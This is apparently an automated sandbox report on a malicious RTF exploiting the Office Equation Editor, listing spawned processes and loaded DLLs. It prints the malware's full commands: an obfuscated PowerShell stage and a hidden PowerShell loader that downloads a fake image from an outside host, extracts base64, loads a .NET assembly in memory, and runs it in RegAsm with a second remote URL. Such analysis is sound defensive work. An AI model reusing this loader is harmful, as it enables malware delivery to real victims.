Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\IEneetworkinglover.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.FDQW/441/57.06.59.32//:ptth' , '1' , 'C:\ProgramData\' , 'WQQ','RegAsm',''))} }"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\WQQ.vbs	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: webio.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: shcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: dwmapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.rtf

Source: C:\Windows\System32\wscript.exe	Automated click: OK
Source: C:\Windows\System32\wscript.exe	Automated click: OK
Source: C:\Windows\System32\wscript.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: H:\System.Management.Automation Controle Financeiro Rump fix\obj\Debug\net20\System.Management.Automation.pdbSHA256+ source: powershell.exe, 00000008.00000002.382499604.00000000042F9000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: H:\System.Management.Automation Controle Financeiro Rump fix\obj\Debug\net20\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.382499604.00000000042F9000.00000004.00000800.00020000.00000000.sdmp

Source: ~WRF{06BA4240-94DA-46E6-9018-D99C6787D57E}.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8D